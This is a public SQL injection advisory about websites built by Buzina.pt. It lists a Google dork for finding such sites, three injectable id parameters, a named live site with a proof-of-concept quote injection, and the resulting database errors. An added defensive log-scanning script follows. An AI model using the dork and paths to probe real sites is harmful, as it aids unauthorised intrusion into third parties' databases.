
Developed By Buzina.pt Hosting Portugal SQL Injection

Author: KingSkrupellos, Published: 08-10-2018
################################################################################################

# Exploit Title : Developed By Buzina.pt Hosting Portugal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : buzina.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Developed By Buzina'' site:pt

# SQL Injection Exploit :

/categoria.php?id=[SQL Injection]

/projectos_single.php?id=[SQL Injection]

/categoria_single.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

factorprestigio.pt/categoria.php?id=12%27 => [ Proof of Concept ] => archive.is/aHt6P

# SQL Database Error =>

Deprecated: Function mysql_db_query() is deprecated in
/home/factorprestigio/public_html/categoria.php on line 26

Deprecated: mysql_db_query(): This function is deprecated; use mysql_query() instead in
/home/factorprestigio/public_html/categoria.php on line 26

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in
/home/factorprestigio/public_html/categoria.php on line 27
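
Added example, not part of the original advisory: a log check a site operator could run to find requests to the three scripts listed above whose id parameter is not a plain integer, such as the id=12%27 request in the proof of concept. The combined access log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script names taken from the advisory; each takes a numeric "id" parameter.
WATCHED = {"categoria.php", "projectos_single.php", "categoria_single.php"}

# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Oct/2018:10:00:01 +0000] "GET /categoria.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Oct/2018:10:00:05 +0000] "GET /categoria.php?id=12%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Oct/2018:10:00:09 +0000] "GET /projectos_single.php?id= HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [04/Oct/2018:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def suspicious_requests(lines):
    """Return (ip, timestamp, path, decoded id) for requests to a watched
    script whose id parameter is anything other than ASCII digits."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        url = urlsplit(m.group("target"))
        # Compare on the file name so installs in a subdirectory also match.
        if url.path.rsplit("/", 1)[-1].lower() not in WATCHED:
            continue
        # parse_qs percent-decodes, so %27 is compared as a quote character.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((m.group("ip"), m.group("ts"), url.path, value))
    return hits

if __name__ == "__main__":
    for ip, ts, path, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts}  {ip}  {path}  id={value!r}")
```

A hit means the request reached the script with input the query was never meant to receive; the durable fix is to cast id to an integer or bind it in a prepared statement, and to stop displaying PHP errors to visitors.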

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
